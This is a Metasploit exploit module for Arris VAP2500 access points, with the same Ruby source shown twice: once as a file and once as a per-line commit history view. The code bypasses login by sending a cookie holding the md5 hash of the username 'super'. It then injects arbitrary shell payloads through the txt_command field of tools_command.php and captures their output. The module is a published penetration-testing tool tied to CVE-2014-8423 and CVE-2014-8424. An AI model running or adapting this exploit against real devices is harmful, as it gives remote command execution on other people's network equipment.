metasploit-framework/modules/exploits/linux/http/vap2500_tools_command_exec.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Arris VAP2500 tools_command.php Command Execution',
      'Description' => %q{
        Arris VAP2500 access points are vulnerable to OS command injection in the web management
        portal via the tools_command.php page. Though authentication is required to access this
        page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid
        username.
      },
      'Author'      =>
        [
          'HeadlessZeke' # Vulnerability discovery and Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2014-8423'],
          ['CVE', '2014-8424'],
          ['OSVDB', '115045'],
          ['OSVDB', '115046'],
          ['BID', '71297'],
          ['BID', '71299'],
          ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/']
        ],
      'DisclosureDate' => 'Nov 25 2014',
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget' => 0
      ))
  end

  def check
    begin
      res = send_request_raw({
        'method' => 'GET',
        'uri' => '/tools_command.php',
        'headers' => {
          'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca", # md5("super")
          }
      })
      if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
        return Exploit::CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Trying to access the device ...")

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
    end

    print_status("#{peer} - Exploiting...")

    uri = '/tools_command.php'
    beg_boundary = rand_text_alpha(8)
    end_boundary = rand_text_alpha(8)

    begin
      res = send_request_cgi({
        'uri'    => uri,
        'vars_post' => {
          'cmb_header'  => '',
          'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}"
        },
        'method' => 'POST',
        'headers' => {
          'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca", # md5("super")
          }
      })
      if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
        print_good("#{peer} - Command sent successfully")
        if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m
          print_status("#{peer} - Command output: #{$1}")
        end
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
Add module for Arris VAP2500 Remote Command Execution 2014-12-02 05:07:56 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = NormalRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Arris VAP2500 tools_command.php Command Execution',`
			`'Description' => %q{`
			`Arris VAP2500 access points are vulnerable to OS command injection in the web management`
			`portal via the tools_command.php page. Though authentication is required to access this`
			`page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid`
			`username.`
			`},`
			`'Author' =>`
			`[`
			`'HeadlessZeke' # Vulnerability discovery and Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`['CVE', '2014-8423'],`
			`['CVE', '2014-8424'],`
			`['OSVDB', '115045'],`
			`['OSVDB', '115046'],`
			`['BID', '71297'],`
			`['BID', '71299'],`
			`['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/']`
			`],`
			`'DisclosureDate' => 'Nov 25 2014',`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`'Space' => 1024`
			`},`
			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`'Targets' => [[ 'Automatic', { }]],`
			`'DefaultTarget' => 0`
			`))`
			`end`

			`def check`
			`begin`
			`res = send_request_raw({`
			`'method' => 'GET',`
			`'uri' => '/tools_command.php',`
			`'headers' => {`
			`'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca", # md5("super")`
			`}`
			`})`
			`if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/`
			`return Exploit::CheckCode::Vulnerable`
			`end`
			`rescue ::Rex::ConnectionError`
			`return Exploit::CheckCode::Unknown`
			`end`

			`Exploit::CheckCode::Safe`
			`end`

			`def exploit`
			`print_status("#{peer} - Trying to access the device ...")`

			`unless check == Exploit::CheckCode::Vulnerable`
			`fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")`
			`end`

			`print_status("#{peer} - Exploiting...")`

			`uri = '/tools_command.php'`
Now with logging of command response output 2014-12-05 16:58:40 +00:00			`beg_boundary = rand_text_alpha(8)`
			`end_boundary = rand_text_alpha(8)`
Add module for Arris VAP2500 Remote Command Execution 2014-12-02 05:07:56 +00:00
			`begin`
			`res = send_request_cgi({`
			`'uri' => uri,`
			`'vars_post' => {`
			`'cmb_header' => '',`
Now with logging of command response output 2014-12-05 16:58:40 +00:00			`'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}"`
Add module for Arris VAP2500 Remote Command Execution 2014-12-02 05:07:56 +00:00			`},`
			`'method' => 'POST',`
			`'headers' => {`
			`'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca", # md5("super")`
			`}`
			`})`
Changed and to && 2014-12-02 06:02:53 +00:00			`if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/`
Add module for Arris VAP2500 Remote Command Execution 2014-12-02 05:07:56 +00:00			`print_good("#{peer} - Command sent successfully")`
Now with logging of command response output 2014-12-05 16:58:40 +00:00			`if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m`
			`print_status("#{peer} - Command output: #{$1}")`
			`end`
Add module for Arris VAP2500 Remote Command Execution 2014-12-02 05:07:56 +00:00			`else`
			`fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")`
			`end`
			`rescue ::Rex::ConnectionError`
			`fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")`
			`end`
			`end`
			`end`